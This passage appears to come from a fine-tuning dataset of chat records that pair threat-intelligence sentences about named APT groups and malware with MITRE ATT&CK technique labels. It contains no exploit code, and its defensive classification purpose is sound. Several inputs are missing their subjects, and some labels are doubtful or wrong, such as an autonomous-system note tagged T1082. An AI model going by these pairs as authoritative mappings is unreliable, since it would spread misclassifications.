- "role": "user",
- "content": "APT32's macOS backdoor can receive a “delete” command."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a command to perform screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has waited a specified time before downloading a second stage payload."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Supported commands “upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 has utilized a UAC bypass tool."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to add the public key of its handlers to the \"authorized_keys\" file to maintain persistence on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1098.004 - SSH Authorized Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has enumerated network shares on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload will use a specific regular expressions dependent on the type of DNS query was used to obtain the command string, which can be seen in Table 2: DNS TYPE Regex Pattern A Address:\\s+(\\d+.\\d+.\\d+.\\d+) AC \\d+-\\d+-(\\d+)-([\\w\\d+/=]+)-\\d-.ac.$Global:domain AAAA Address:\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\w|:]+){1,8}) CNAME,MX,TXT,SRV,SOA (\\d+)-([\\w\\d/=+]{0,})\\-.$Global:domain Table 2 Types of responses provided by C2 These regular expressions are used to build strings that the payload will then subject to its command handler"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors use to schedule tasks to run self-extracting RAR archives, which install or on other victims on a network."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Given the regional file format used there is a chance that some security software suites may not handle them well, and this may have provided an evasion case for the attacker.The documents sent to the targets were titled \"Analysis of \"Northern New Year in 2017\" and used the official logo of the Korean Ministry of Unification"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of WEBC2 achieve persistence by using DLL search order hijacking, usually by copying the DLL file to \"%SYSTEMROOT%\" (\"C:\\WINDOWS\\ntshrui.dll\")."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has enumerated hosts via Empire, gathering the username, domain name, machine name, and other system information."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avenger has the ability to XOR encrypt files to be sent to C2."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used WinRM to enable remote execution."
- },
- {
- "role": "assistant",
- "content": "T1021.006 - Remote Services: Windows Remote Management"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The message sent to the C2 will be “file is deleted.” if successful or “file is not deleted.” if unsuccessful"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet"
- },
- {
- "role": "assistant",
- "content": "T1205.001 - Port Knocking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish using a AppCertDLLs Registry key."
- },
- {
- "role": "assistant",
- "content": "T1546.009 - Event Triggered Execution: AppCert DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 regularly used stealthy techniques to blend in with legitimate user activity: During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus can be partly encrypted with XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete malware and associated artifacts from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "created a custom video recording capability that could be used to monitor operations in the victim's environment."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments. TeamTNT has also targeted exposed kubelets for Kubernetes environments."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution. The group has also used an exploit toolkit known as Threadkit that launches .bat files."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower has the ability to use \"ipconfig\" to enumerate system network settings."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Phishing emails with political themes were used in the majority of the observed attack emails"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa has used Python scripts to deploy ransomware."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To deploy the file injector, the instrumentor downloads additional payloads to be injected into a benign process"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2 SYSCON network traffic witnessed during execution Pivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional samples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the CARROTBAT malware family"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands such as net group and net localgroup can be used in to gather information about and manipulate groups."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ping can be used to identify remote systems within a network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise configures itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ConnectWise can take screenshots on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth creates a startup item for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy will attempt to detect if a usable smart card is current inserted into a card reader."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can use JavaScript code for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has communicated with C2 servers over port 6667 (for IRC) and port 8080."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish using a Registry run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SamSam has been seen using AES or DES to encrypt payloads and payload components."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has manipulated timestamps for creation or compilation dates to defeat anti-forensics."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used QuickZip to archive stolen files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap, a Linux malware that we recently stumbled upon, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon schedules tasks to invoke its components in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware that leveraged WMI for execution and querying host information."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp can download and execute new plugins from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g. hxxps://185[.]225[.]69[.]69/) and logs the HTTP response to a plaintext log file (e.g. loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis uses \"ipconfig\" to gather the IP address from the system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once on the network, the attackers engaged in network reconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following commands"
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker adds keys to the Registry at \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\" and various other Registry locations."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used the ntdsutil.exe utility, which was present on a target's Active Directory® server to export the Active Directory database for credential access."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses single-byte XOR obfuscation to obfuscate many of its files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\\Intel\\Skype."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture', 'T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 6 Authentication dialog box with fake credentials entered On the C2 server, we observed Phishery receiving the inbound request and capturing the credentials, as seen in Figure 7"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has the ability to list open windows on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With DCShadow, attackers no longer have to replicate data, but can register new domain controllers in the targeted infrastructure to inject backdoor changes in AD objects, or alter existing ones by replacing the attributes’ values."
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has downloaded additional malware, including by using ."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We also noticed that the actors reused the VBS decode function published by Motobit. Figure 4 shows the comparison between the base64 function used in the macro code and the VBS base64 decoder function published by Motobit"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has compromised legitimate domains, including those hosted in the US and Italy, for C2."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the OS version and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects a list of install programs and services on the system’s machine."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NavRAT creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware uses Caracachs encryption to encrypt C2 payloads."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prikormka contains a module that captures screenshots of the victim's desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell’s IEX function"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can use the function \"GetIpNetTable\" to recover the last connections to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The autonomous system name of the IP shows that the allocation is controlled by Serverius Holding B.V., which is an autonomous system name we have previously seen associated with the OilRig group"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to execute the additional modules, the malware uses the process hollowing technique for hiding the malicious payload inside an allowlisted process, such as svchost.exe. The payloads are stored encrypted in the filesystem and decrypted in the memory as they are executed"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In most cases, UNC2165 has stolen data from its victims to use as leverage for extortion after it has deployed ransomware across an environment. In intrusions where the data exfiltration method could be identified, there is evidence to suggest the group used either Rclone or MEGASync to transfer data from the victims' environments prior to encryption. The Rclone utility is used by many financially motivated actors to synchronize sensitive files with cloud storage providers, and MEGASync synchronizes data to the MEGA cloud hosting service."
- },
- {
- "role": "assistant",
- "content": "T1537 - Transfer Data to Cloud Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 collected the victim's username and executed the \"whoami\" command on the victim's machine. APT32 executed shellcode to collect the username on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used the Registry to store encrypted payloads."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
